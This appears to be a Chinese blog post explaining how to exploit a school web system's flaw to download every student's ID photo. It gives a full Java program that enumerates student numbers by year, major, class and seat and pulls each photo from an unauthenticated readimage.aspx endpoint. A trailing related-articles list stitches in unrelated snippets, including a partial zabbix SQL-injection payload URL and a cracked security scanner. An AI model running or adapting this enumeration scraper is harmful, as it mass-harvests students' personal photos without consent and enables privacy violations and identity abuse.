如何通过漏洞遍历全校的学号下载全校学生的证件照

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;

public class Download {

 /**
  * @param args
  * @throws Exception
  */
 public static void main(String[] args) throws Exception {
  // TODO Auto-generated method stub
     int zhuanye[]=new int[]{125,109,110,118,119,318,704,126,701,702,703,705,706,707,207,209,802,803,201,203,206,801,804,805,806,120,901,105,107,301,123,124,312,311,321,322,307,1001,1002,1003,1106,210,1105,402,403,405,1103,1104,412,1101,1102,208,411,324,410,323,313,314,1201,1202,1203,1204,1205,1206,510,604,509,501,1301,508,511,512,506,1401,605,601,602,1501};// 全校的专业号
     int xuenian[]=new int[]{13,14};
 for(int xn=0;xn<xuenian.length;xn++){
  for(int zy=0;zy<zhuanye.length;zy++){
   for(int c=1;c<=5;c++){
    for(int d=1;d<=55;d++){
      int i = xuenian[xn]*100000000+zhuanye[zy]*10000+c*100+d;
      System.out.println(i);
      download("http://***********************/readimage.aspx?xh="+i, i+".jpg","c:\\333\\");  // 保护隐私~
    }
   }
  }
 }
}
 public static void download(String urlString, String filename,String savePath) throws Exception {
     // 构造URL
     URL url = new URL(urlString);
     // 打开连接
     URLConnection con = url.openConnection();
     //设置请求超时为5s
     con.setConnectTimeout(5*1000);
     // 输入流
     InputStream is = con.getInputStream();

     // 1K的数据缓冲
     byte[] bs = new byte[1024];
     // 读取到的数据长度
     int len;
     // 输出的文件流
    File sf=new File(savePath);
    if(!sf.exists()){
     sf.mkdirs();
    }
    OutputStream os = new FileOutputStream(sf.getPath()+"\\"+filename);
     // 开始读取
     while ((len = is.read(bs)) != -1) {
       os.write(bs, 0, len);
     }
     // 完毕,关闭所有链接
     os.close();
     is.close();
 }

}
时间: 2024-08-07 15:30:12

如何通过漏洞遍历全校的学号下载全校学生的证件照的相关文章

遍历数组按学号找人,若找到则输出信息,否则输出&quot;查无此人&quot;

//建立一个类类型的数组,并向这个数组内添加学生信息,包括姓名和年龄等 **********************学生类************************** package practise03_1; public class Student { private String name; private int age; public String getName() { return name; } public void setName(String name) { thi

第12天内容

作业: 1.描述HashMap内部实现原理. HashMap存的是K-V对,K是唯一的不重复的. 原理: 现将hascode进行处理(Hascode右移16位后与自身进行异或运算,目的是将值打散因为如果进行或运算或者与运算会时结果偏大或偏小)然后该值和集合的容量(一般是15)进行与运算,得到一个介于0-15之间的值,该值表示该元素落在的数组下标,也就是该元素储存在数组中的存储位置.Hash散列方法效率较高,是针对关键词搜索的算法,当搜于某个元素时,通过Hash方法可以将搜索范围落在指定位置上,提

《Python从小白到大牛》第9章 数据结构

当你有很多书时,你会考虑买一个书柜,将你的书分门别类摆放进入.使用了书柜不仅仅使房间变得整洁,也便于以后使用书时方便查找.在计算机程序中会有很多数据,这些数据也需要一个容器将他们管理起来,这就是数据结构.常见的数据结构:数组(Array).集合(Set).列表(List).队列(Queue).链表(Linkedlist).树(Tree).堆(Heap).栈(Stack)和字典(Dictionary)等结构. Python中数据容器主要有:序列.集合和字典. 注意Python中并没有数组结构,因为

Hacker(20)----手动修复Windows系统漏洞

Win7系统中存在漏洞时,用户需要采用各种办法来修复系统中存在的漏洞,既可以使用Windows Update修复,也可使用360安全卫士来修复. 一.使用Windows Update修复系统漏洞 Windows Update时Microsoft公司提供的一款自动更新工具,该工具提供了漏洞补丁的安装.驱动程序和软件的升级等功能.利用Windows Update可以更新当前的系统,扩展系统的功能,让系统支持更多的软.硬件,解决各种兼容性问题,打造更安全.更稳定的系统. 1)打开控制面板 2)单击Wi

zabbix 爆高危 SQL 注入漏洞,可获系统权限(profileIdx 2 参数)

漏洞概述 zabbix是一个开源的企业级性能监控解决方案.近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限. 影响程度 攻击成本:低 危害程度:高 是否登陆:不需要 影响范围:2.2.x, 3.0.0-3.0.3.(其他版本未经测试) 漏洞测试 在zabbix地址后面添加这串url jsrpc.php?type=9&method=s

如何下载?

先上传文件,再遍历文件,最后下载文件

Web安全扫描器Netsparker v3.5 -中国寒龙整理收集 欢迎下载

Web安全扫描器Netsparker v3.5 破解版 Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强大.Netsparker与其他综合性的web应用安全扫描工具相比的一个特点是它能够更好的检测SQL Injection和 Cross-site Scripting类型的安全漏洞. 新版本特性 <span class="pln">* DOM跨站脚本漏洞检测 * 基于Chrome浏览器的Dom解析 * URL重写规则 *

关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,你不能泄露出来啊,我们要感谢伟大的组织Shadow Brokers(影子经纪人)多酷炫的名字,有木有很文艺的感觉,感谢他让我们小屁民也用用NSA的工具,O(∩_∩)O哈哈哈~,2016 年 8 月Shadow Brokers入侵了方程式组织(Equation Group是NSA下属的黑客组织)窃

libcurl的封装,支持同步异步请求,支持多线程下载,支持https

最近在做一个项目,需要用到http get post等 需求分析需要做到同步和异步,异步请求的返回以可选的回调通知的方式进行. 本人以Linux为例,一步一步的来实现. 配置并且编译libcurl我以在Linux底下的交叉编译举例.libcurl源码下载: http://curl.haxx.se/download.html配置libcurl支持https和zlib压缩,必须需要openssl和zlib库openssl库源码下载: http://www.openssl.org/source/.下载